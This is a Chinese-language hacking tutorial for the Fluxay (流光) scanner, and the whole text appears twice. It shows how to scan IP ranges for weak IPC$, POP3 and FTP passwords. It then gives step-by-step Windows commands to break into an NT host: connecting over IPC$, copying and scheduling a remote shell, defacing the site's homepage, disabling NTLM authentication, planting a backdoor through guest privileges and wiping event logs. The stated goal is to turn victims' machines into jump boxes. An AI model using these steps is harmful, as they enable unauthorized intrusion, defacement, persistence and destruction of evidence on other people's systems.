流光5.0破解密碼教程
流光5.0破解密碼教程
流光5.0的使用方法
1:流光概述
流光,這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專(zhuān)業(yè)的黑客,這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3,F(xiàn)TP,HTTP,PROXY,F(xiàn)ROM,SQL,SMTP,IPC,等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。
2:流光使用:
步驟1:打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)
“文件”--}“高級(jí)掃描向?qū)?rdquo;
--}在“起始”/“結(jié)束”位置填入,你要掃描的IP段。
--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。
--}在“獲取主機(jī)名”、“PING檢查”前面打勾
--}在“檢測(cè)項(xiàng)目”中選擇“全選”
--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”
說(shuō)明:“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。
“自定義”可以自己定義進(jìn)行掃描。
--}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”
--}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。
步驟2:?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。
步驟3:查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告
方法二:
一、POP3/FTP/…探測(cè)
二、IPC探測(cè)
三、SQL探測(cè)
四、高級(jí)掃描
五、其它 …
因?yàn)殚_(kāi)發(fā)時(shí)間的原因,上面的探測(cè)模式略有不同,所以分成了四個(gè)部分,本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了:)
流光的IPC探測(cè):
一、目的和任務(wù):
1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限,并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。
2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。
二、探測(cè)流程:
1、你得有流光,我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000,否則流光啟動(dòng)會(huì)失敗!
什么是IPC:
IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$,是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。
IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,它的特點(diǎn)是在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。
注意,你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò),是不是太笨了點(diǎn) …
2、首次啟動(dòng)流光,會(huì)看到注冊(cè)的畫(huà)面,具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板,那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。
在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng),或者直接按Ctrl+R。
3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機(jī)
4、探測(cè)中……
(注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段,會(huì)被禁止的,也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)
有遠(yuǎn)程主機(jī)的管理密碼了,我們剩下的就是想辦法控制它了,有什么好辦么? :)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢,我以后在說(shuō),今天還是先練習(xí)net 命令吧。
黑了他 !
開(kāi)個(gè)dos prompt 執(zhí)行如下命令,本次用的例子如下圖。
1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶(hù)名" || 建立遠(yuǎn)程連接
2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 :) 這里文件多。
3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間
4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序,在這里我們用soon這個(gè)程序來(lái)做也可以,它可以取代 3/4兩步。
5、 telnet 對(duì)方ip 端口 ||
6、輸入pass (如果不是用icmd.exe,或者沒(méi)有設(shè)置口令就不用了) ||
7、在開(kāi)個(gè)窗口,繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了,我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止,一般是在X:\interpub\wwwroot\ .
假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot,這樣:copy default.htm \ip\c$\interpub\wwwroot
下面的圖有演示
8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的:(,我們最好是物有所有,作成跳板吧,今后干活方便點(diǎn):
執(zhí)行我們copy 過(guò)去的ntlm.exe ,取消驗(yàn)正。在給自己留個(gè)后門(mén),比如提升guest的權(quán)限,或者其它的后門(mén)工具,這類(lèi)東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的么 ?
當(dāng)然了,只要你有時(shí)間,并且愿意做,我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上,速度快、空間無(wú)限,嘿嘿 :)
10、日志清除,斷開(kāi)連接 :
執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在斷開(kāi)連接:net use \ip\ipc$ /delete
流光簡(jiǎn)介
流光4.7)一個(gè)絕好的ftp、pop3解密工具,界面豪華,功能強(qiáng)大!功能簡(jiǎn)介如下:1、用于檢測(cè)POP3/FTP主機(jī)中用戶(hù)密碼安全漏洞。2、163/169雙通。3、多線(xiàn)程檢測(cè),消除系統(tǒng)中密碼漏洞。4、高效的用戶(hù)流模式。5、高效服務(wù)器流模式,可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線(xiàn)程探測(cè)。7、線(xiàn)程超時(shí)設(shè)置,阻塞線(xiàn)程具有自殺功能,不會(huì)影響其他線(xiàn)程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。
流光4.7新增功能:
1、加入了本地模式,在本機(jī)運(yùn)行是不必安裝Sensor。
2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。
3、后臺(tái)掃描模式時(shí),掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長(zhǎng)度最多可到192bits,保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務(wù),新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。
8、Sensor的服務(wù)名稱(chēng)可以任意指定,控制服務(wù)和Sensor的進(jìn)程名稱(chēng)也可以任意指定。
9、支持XP(本地模式),很快會(huì)有98/ME的版本。
流光5.0的使用方法
1:流光概述
流光,這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專(zhuān)業(yè)的黑客,這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3,F(xiàn)TP,HTTP,PROXY,F(xiàn)ROM,SQL,SMTP,IPC,等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。
2:流光使用:
步驟1:打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)
“文件”--}“高級(jí)掃描向?qū)?rdquo;
--}在“起始”/“結(jié)束”位置填入,你要掃描的IP段。
--}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。
--}在“獲取主機(jī)名”、“PING檢查”前面打勾
--}在“檢測(cè)項(xiàng)目”中選擇“全選”
--}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”
說(shuō)明:“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。
“自定義”可以自己定義進(jìn)行掃描。
--}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”
--}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。
步驟2:?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。
步驟3:查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告
方法二:
一、POP3/FTP/…探測(cè)
二、IPC探測(cè)
三、SQL探測(cè)
四、高級(jí)掃描
五、其它 …
因?yàn)殚_(kāi)發(fā)時(shí)間的原因,上面的探測(cè)模式略有不同,所以分成了四個(gè)部分,本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了:)
流光的IPC探測(cè):
一、目的和任務(wù):
1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限,并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。
2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。
二、探測(cè)流程:
1、你得有流光,我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000,否則流光啟動(dòng)會(huì)失敗!
什么是IPC:
IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$,是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。
IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,它的特點(diǎn)是在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。
注意,你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò),是不是太笨了點(diǎn) …
2、首次啟動(dòng)流光,會(huì)看到注冊(cè)的畫(huà)面,具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板,那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。
在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng),或者直接按Ctrl+R。
3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機(jī)
4、探測(cè)中……
(注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段,會(huì)被禁止的,也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)
有遠(yuǎn)程主機(jī)的管理密碼了,我們剩下的就是想辦法控制它了,有什么好辦么? :)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢,我以后在說(shuō),今天還是先練習(xí)net 命令吧。
黑了他 !
開(kāi)個(gè)dos prompt 執(zhí)行如下命令,本次用的例子如下圖。
1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶(hù)名" || 建立遠(yuǎn)程連接
2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 :) 這里文件多。
3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間
4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序,在這里我們用soon這個(gè)程序來(lái)做也可以,它可以取代 3/4兩步。
5、 telnet 對(duì)方ip 端口 ||
6、輸入pass (如果不是用icmd.exe,或者沒(méi)有設(shè)置口令就不用了) ||
7、在開(kāi)個(gè)窗口,繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了,我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止,一般是在X:\interpub\wwwroot\ .
假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot,這樣:copy default.htm \ip\c$\interpub\wwwroot
下面的圖有演示
8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的:(,我們最好是物有所有,作成跳板吧,今后干活方便點(diǎn):
執(zhí)行我們copy 過(guò)去的ntlm.exe ,取消驗(yàn)正。在給自己留個(gè)后門(mén),比如提升guest的權(quán)限,或者其它的后門(mén)工具,這類(lèi)東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的么 ?
當(dāng)然了,只要你有時(shí)間,并且愿意做,我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上,速度快、空間無(wú)限,嘿嘿 :)
10、日志清除,斷開(kāi)連接 :
執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在斷開(kāi)連接:net use \ip\ipc$ /delete
流光簡(jiǎn)介
流光4.7)一個(gè)絕好的ftp、pop3解密工具,界面豪華,功能強(qiáng)大!功能簡(jiǎn)介如下:1、用于檢測(cè)POP3/FTP主機(jī)中用戶(hù)密碼安全漏洞。2、163/169雙通。3、多線(xiàn)程檢測(cè),消除系統(tǒng)中密碼漏洞。4、高效的用戶(hù)流模式。5、高效服務(wù)器流模式,可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線(xiàn)程探測(cè)。7、線(xiàn)程超時(shí)設(shè)置,阻塞線(xiàn)程具有自殺功能,不會(huì)影響其他線(xiàn)程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。
流光4.7新增功能:
1、加入了本地模式,在本機(jī)運(yùn)行是不必安裝Sensor。
2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。
3、后臺(tái)掃描模式時(shí),掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長(zhǎng)度最多可到192bits,保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務(wù),新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。
8、Sensor的服務(wù)名稱(chēng)可以任意指定,控制服務(wù)和Sensor的進(jìn)程名稱(chēng)也可以任意指定。
9、支持XP(本地模式),很快會(huì)有98/ME的版本。